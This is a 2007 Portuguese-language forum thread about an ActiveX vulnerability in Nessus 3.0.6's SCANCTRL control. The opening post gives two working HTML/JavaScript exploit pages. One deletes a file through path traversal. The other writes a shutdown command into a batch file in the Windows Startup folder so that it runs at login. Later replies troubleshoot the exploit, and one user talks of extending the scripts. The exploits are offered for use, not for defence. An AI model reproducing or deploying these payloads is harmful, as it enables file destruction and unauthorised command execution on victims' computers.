[Vulnerabilidade] Nessus 3.0.6

HadeS · 06 de August , 2007, 11:30:57 AM

Uma falha no Nessus permite que usuários mal intencionados rodem comandos por controles ActiveX no computador da vítima.

A falha está em: Nessus SCANCTRL.ScanCtrlCtrl.1 ActiveX Control

Veja um exemplo de código para exploração:

Code Select

<HTML>
<object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object>

<script language="javascript">
obj.deleteReport("../../../../../../../test.txt"); //Deleting file: C:\test.txt
alert("done");
</script>
</HTML>

Um outro exemplo:

Code Select

<HTML>
<object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object>

<script language="javascript">
obj.addsetConfig('shutdown -t 1000 -s -c "hello world ;]" && pause', '', '');
obj.saveNessusRC("../../../../../../Documents and Settings/All Users/Menu Start/Programy/Autostart/exec.bat");
</script>
</HTML>

O primeiro exemplo irá excluir o arquivo test.txt na raíz do sistema, o segundo acho que não preciso nem falar.

HadeS

Be.Cool · 06 de August , 2007, 01:46:49 PM

Orra muito loko!
da pra dar uma implementada legal nesses script!
vlw

fui.

Anonymous · 06 de August , 2007, 04:21:41 PM

[O primeiro exemplo irá excluir o arquivo test.txt na raíz do sistema, o segundo acho que não preciso nem falar.]

HadeS,

Neste trecho do primeiro código, vc substituiu as barras por diretórios ou deixou assim, porque comigo não aconteceu nada.

obj.deleteReport("../../../../../../../test.txt");

Be.Cool · 06 de August , 2007, 04:59:45 PM

@DARK BOMBER
Não precisa colocar os diretorios porque o ../ significa que vc vai descer um diretorio
ou seja se vc colocar varios ../ vc vai chegar na raiz do sistema onde vc devia ter colocado o test.txt

fui.

Anonymous · 06 de August , 2007, 05:03:31 PM

Pois é, foi assim que eu testei e não deu certo, por isso que eu tava achando
que tinha que mudar os diretórios.

Criei um arquivo qualquer no disco C: com o nome test.txt , em seguida abri o primeiro código no browser e não aconteceu nada com o arquivo no disco c:.

Be.Cool · 06 de August , 2007, 05:40:01 PM

vc tem o nessus?
vc deixou ele executando?

fui.

Anonymous · 06 de August , 2007, 06:37:54 PM

Não, não tenho o nessus.

HadeS · 06 de August , 2007, 07:39:24 PM

Huahauhauauahuahau...

A falha está no Nessus cara, como quer ser explorado sem ter ele instalado?

lol

HadeS

Anonymous · 06 de August , 2007, 10:16:33 PM

Você tem ele disponível pra gente?

Dri.vicaria · 06 de August , 2007, 10:51:00 PM

Êta preguiça.........http://www.nessus.org/

Pô, rapaz, é o mais famoso scanner de vulnerabilidade...com Linux, of corse !!!! ;)
Bjs,

Dri

Anonymous · 06 de August , 2007, 11:05:17 PM

É que o nessus eu não conhecia.

tô baixando!
brigado. ::)

Anonymous · 07 de August , 2007, 12:02:46 AM

Desculpa pelo duplo post, é que usei o nessus e acho que ele abriu 4 portas aki, tem como fechar?

Ele é poderoso!

Be.Cool · 19 de August , 2007, 07:55:53 PM

@dark bomber
vc pode bloquea-lo pelo firewall ou baixa o porgrama tcp list do Dark_Side que fecha a porta que vc quiser =)
vlw

fui.

[Vulnerabilidade] Nessus 3.0.6

Anonymous

Anonymous

Anonymous

Anonymous

Anonymous

Anonymous